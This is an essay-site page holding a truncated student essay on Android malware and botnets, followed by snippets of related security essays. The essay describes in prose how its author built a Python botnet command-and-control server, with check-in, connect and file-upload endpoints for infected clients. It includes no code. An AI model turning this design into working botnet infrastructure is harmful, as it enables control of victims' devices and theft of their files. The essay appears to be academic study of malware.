Android Malware And Botnet Analysis

Great Essays
Android Malware and Botnets
Malware in differing forms has been present since computers were first invented. One of the most interesting kinds of malware is that which takes control of a computer and reports back to the malicious actor that infected the computer. The malware allows an attacker to use the infected computer, effectively making the computer a bot. Normally, these bots are part of a network of infected computers known as a botnet. The attacker in control of a botnet can use it for a variety of purposes. One of the most common uses for a botnet is to perform distributed denial of service attacks (DDoS), where the bots send massive amounts of web traffic to a single website and attempt to bring it down. Botnets can also be used to
…show more content…
Specifically, I used the Jet Brains PyCharm IDE for development (PyCharm: Download Latest, 2016). I chose this due to its error checking of code and debugging capabilities. As already explained, initially the command and control server was to use sockets to communicate with clients. This did not pan out. Instead, I utilized the “http.server” library in python (http.server--HTTP Servers, 2016). The class to handle HTTP requests was only a few lines of code which could easily be expanded to fit my needs. I focused mainly on the “do_post” function, as all requests were done via POST in HTTP. In addition to the communications, the command and control server would also need to keep track of clients and take command input from the user running the server. To handle commands, I created a simple while loop that prompts for input until the “exit” command is given. Behind this, I also created a list of valid commands to check for. To keep track of clients I utilized a dictionary of key value pairs (Data Structures, 2016). The key would need to be unique to each individual device. UUIDs fit the bill here, so each device was identified by a UUID (Leach, Mealling, & Salz, 2005). The value in the dictionary had to be customized to store data for a client. Therefore, I created a class that could hold a variety of information regarding the client. The next step was to create the handlers for each command. I created a “connect” URL that clients visited the first time they connected to the botnet, a “checkin” URL that they check in to every 30 seconds, and a “fileupload” URL where the client sends a file and metadata to the server. After figuring out the communication methods, I determined simple commands that could be run. These will be listed in the results section. The next step was to implement timers to see when the client last checked in. On the

Related Documents

  • Superior Essays

    Pt1420 Unit 5 Lab Report

    • 1875 Words
    • 8 Pages

    Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service attack. It is run on web servers, with the purpose of identifying software susceptibilities in client machines, communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client. 3 e. How many options are there? How many of these are required?…

    • 1875 Words
    • 8 Pages
    Superior Essays
  • Improved Essays

    Johnson 6 virus, worms, malware or spyware. It’s very interesting if one goes onto google play or the one from Apple, there are numerous applications created to do a phone scan and to check newly installed applications to ensure your phone is protected from viruses. The world wide web is like playing Russian roulette because of the possibility of contracting a virus or worm. Hackers across the globe will forever be a serious threat to citizens around the world and National Security. The Department of Defense along with the Department of Homeland Security oversee security measure to protect the United States from cyber-attacks.…

    • 955 Words
    • 4 Pages
    Improved Essays
  • Improved Essays

    Nt1330 Unit 7

    • 1149 Words
    • 5 Pages

    Destructive malware will utilize popular communication tools to spread, including worms sent through email and instant messages, Trojan horses dropped from web sites, and virus-infected files downloaded from peer-to-peer connections. Malware will also seek to exploit existing vulnerabilities on systems making their entry quiet and easy (Malware). Malware is able to accomplish this by its works to remain unnoticed, either by actively hiding or by simply not making its presence on a system known to the user. The type of malware that could be used is a Rootkit Malware. A rootkit is a type of software designed to hide the fact that an operating system has been compromised, sometimes by replacing vital executable.…

    • 1149 Words
    • 5 Pages
    Improved Essays
  • Great Essays

    Answer these questions based on the rules What would you do if someone threatened to DDoS/DoS the server: I would mute or either ban them. Threatening to DDos is a bannable or mutable offence! What would you do if you caught someone x-raying and they admitted it: I would give them a reduced ban for admitting and giving me less time to SS!…

    • 637 Words
    • 3 Pages
    Great Essays
  • Improved Essays

    The Win32/Sogou is a dangerous Trojan Downloader that invades the windows based PCs without getting permission from the user. This malicious application spreads through social media websites and can destroy a computer in a way that it becomes useless permanently. This tricky Trojan application is developed by the hackers to get remote access of the data and system folders in computer. Dalhousie University dataset contains both botnet and benign traces.…

    • 404 Words
    • 2 Pages
    Improved Essays
  • Superior Essays

    Please research one virus and one worm, and write a maximum 2-page single-spaced paper explaining what each of them is, what they do, what their impact was, what the mechanics of how they work are (the technical aspect), and how were they stopped. Computer virus: It is a piece of code which is loaded onto the computer without the user knowledge and runs itself. When this code is executed, it makes a copy of itself and inserts this copy into another computer programs, data files of the hard drive. Such small virus also steals hard disk space and CPU time , corrupts data.…

    • 1405 Words
    • 6 Pages
    Superior Essays
  • Improved Essays

    IS3110 Lab Answers

    • 739 Words
    • 3 Pages

    1. What are the danger to the system? There numerous dangers that can put your system at danger, for example, infections, spyware, worms, Trojans and PC programmers. Your systems are additionally helpless excessively critical who perpetrate cybercrimes. 2.…

    • 739 Words
    • 3 Pages
    Improved Essays
  • Improved Essays

    Managing Threats to Data Common threats to data consist of Botnets, DDoS (Distributed denial of service), Hacking, etc. You can manage and prevent data threats with antivirus/malware/hacking/etc software. By downloading a legitimate program you can protect your computers data. The software will alert you if there is something out of place in your computer before it’s too late, so you can get it removed.…

    • 1963 Words
    • 8 Pages
    Improved Essays
  • Improved Essays

    We live in the modern time where new technology got develop every day to make life become easier for people. Hundreds of years ago, no one would ever imagine that a thing like “the internet” would be invented. Without a doubt, the internet was one of the best intervention that has ever got invented. Not only that the internet has the life of more than most other creations; but it is also the fundamental part in every aspect of life especially in business, education and entertainment. In the article “Is Google Making Us Stupid?”…

    • 673 Words
    • 3 Pages
    Improved Essays
  • Superior Essays

    Mis-790 Comprehensive Exam

    • 1348 Words
    • 6 Pages

    MIS 790 Comprehensive Exam Q1. To be able to build prediction models of botnet attacks, we had to decide information requirements. (a) What process did you use for identifying predictor variables for modelling botnet traffic flows? (b) What additional measures can be taken in terms of information (or data) gathering to further improve the accuracy of the prediction models? (a) I started with a literature survey and read articles to understand the problem and technical terms.…

    • 1348 Words
    • 6 Pages
    Superior Essays
  • Improved Essays

    Denial-Of-Service Attack

    • 756 Words
    • 4 Pages

    “Denial-of-Service attacks are the cyber equivalent of vandalism. Rather than seek to break into the target system, the perpetrator simply wishes to render the target system unusable” (Easttom, Taylor, 2011). This type of cybercrime prevents the end users from attaining the resource accessibility. Denial-of-Service is also known as a DOS. An attack was launched in Santa Cruz County website in California that caused “county’s government entities and programs, including Emergency Services, Law Enforcement, the Courts, Social Services, Agricultural Extension, Employment, Surplus Sales, Vendor Registration, and Construction Projects and Proposals”( U.S. Attorney’s Office,2011).…

    • 756 Words
    • 4 Pages
    Improved Essays
  • Great Essays

    These are traps set in the firewall of the system which help in recording the attacks of intruders on the system. Honeypots are used to research on the complex information of cyber attacking…

    • 1226 Words
    • 5 Pages
    Great Essays
  • Improved Essays

    • Malicious process monitoring: We could make use of a tool like a windows registry accesses which helps tracks all the malicious programs trying to access the system. Such a tool on the dashboard greatly benefits the user since they can try keep the system safe without any external threats entering the system without notifying the user. The real time updating of the tool in this case will be easier because the user needs to only notified of programs that require them to look at the program as fast as they can. o Requires attention: The sub-point inside this metric could be a metric that can be called Requires Immediate attention. Not all the malicious software trying to access the system are of level 10 danger.…

    • 1042 Words
    • 5 Pages
    Improved Essays
  • Improved Essays

    IT security threats and cryptography 7/A. P1: Explain the different security threats that can affect the IT systems of originations. 7/A.M1: Assess the impact that IT security threats can have on organization's IT systems and business whilst taking account of the principles of information security and legal requirements In today's society data is a very valuable thing companies have to take in to account how to protect that data from the threats, Threats is a way in which the data is vulnerable and therefore rules and regulations have been put in place to stop these potential threats for example all will have adhere to the principles of information security this is a way in which data is protected, I have been working for a start-up company…

    • 1332 Words
    • 6 Pages
    Improved Essays
  • Great Essays

    Ransomware Essay

    • 1262 Words
    • 6 Pages

    Information systems permeate the fabric of everyday life. Families use them to remain in touch, organize their lives, and store memories. Multibillion dollar businesses use them to store critical data, increase efficiency, and maximize profits. They exist on cell phones, laptops, ATMs, televisions, servers, and more. A vast amount of data is gathered, stored, and processed from millions of devices worldwide to influence commerce and advise governments.…

    • 1262 Words
    • 6 Pages
    Great Essays